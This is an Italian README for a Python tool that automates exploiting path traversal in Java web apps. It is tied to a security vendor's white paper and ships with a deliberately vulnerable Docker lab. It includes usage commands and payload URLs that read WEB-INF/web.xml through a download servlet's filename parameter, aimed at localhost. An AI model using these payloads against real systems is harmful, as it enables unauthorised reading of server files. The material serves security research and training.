
Strumento per aiutare nello sfruttamento delle vulnerabilità di path traversal nelle applicazioni web Java
Strumento per aiutare nello sfruttamento delle vulnerabilità di path traversal nelle applicazioni web Java.
Questo strumento è citato nel white paper di Invicti Security Sfruttare le vulnerabilità di path traversal nelle applicazioni web Java.
Per questo strumento è richiesto Python3.
Esegui il seguente comando:
pip install -r requirements.txt
Dopo l'installazione, fornisci un URL di exploit in questo modo:
usage: python WebXMLExp.py <url_with_web_xml_exploit_or_inject_here_marker>
I risultati (i file scaricati) sono disponibili nella cartella results.
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=<INJECT-HERE>"
Un'applicazione web vulnerabile a una vulnerabilità di path traversal è fornita nella cartella docker.
Per iniziare, entra nella cartella docker ed esegui:
docker-compose up
L'applicazione è accessibile all'indirizzo http://127.0.0.1:8082/vulnerable/.
Per sfruttare la vulnerabilità di path traversal visita: http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml